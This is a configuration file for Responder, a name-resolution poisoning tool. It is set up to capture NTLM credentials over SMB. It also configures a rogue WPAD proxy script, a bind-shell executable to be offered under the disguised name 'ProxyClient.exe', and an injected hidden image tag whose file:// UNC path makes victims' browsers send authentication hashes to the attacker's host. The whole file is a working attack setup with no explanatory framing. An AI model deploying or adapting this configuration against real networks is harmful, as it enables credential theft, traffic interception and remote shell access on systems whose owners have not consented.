[Responder Core]
sql = Off
smb = On
rdp = Off
kerberos = Off
ftp = Off
pop = Off
smtp = Off
imap = Off
http = Off
https = Off
dns = Off
ldap = Off
challenge = Random
database = ScanAd 1.db
sessionlog = Responder-Session.log
poisonerslog = Poisoners-Session.log
analyzelog = Analyzer-Session.log
responderconfigdump = Config-Responder.log
respondto = 
respondtoname = 
dontrespondto = 
dontrespondtoname = ISATAP
autoignoreaftersuccess = Off
capturemultiplecredentials = On
capturemultiplehashfromsamehost = On

[HTTP Server]
serve-always = Off
serve-exe = Off
serve-html = Off
htmlfilename = files/AccessDenied.html
exefilename = files/BindShell.exe
exedownloadname = ProxyClient.exe
wpadscript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
htmltoinject = <img src='file://///RespProxySrv/pictures/logso.jpg' alt='Loading' height='1' width='1'>

[HTTPS Server]
sslcert = certs/responder.crt
sslkey = certs/responder.key

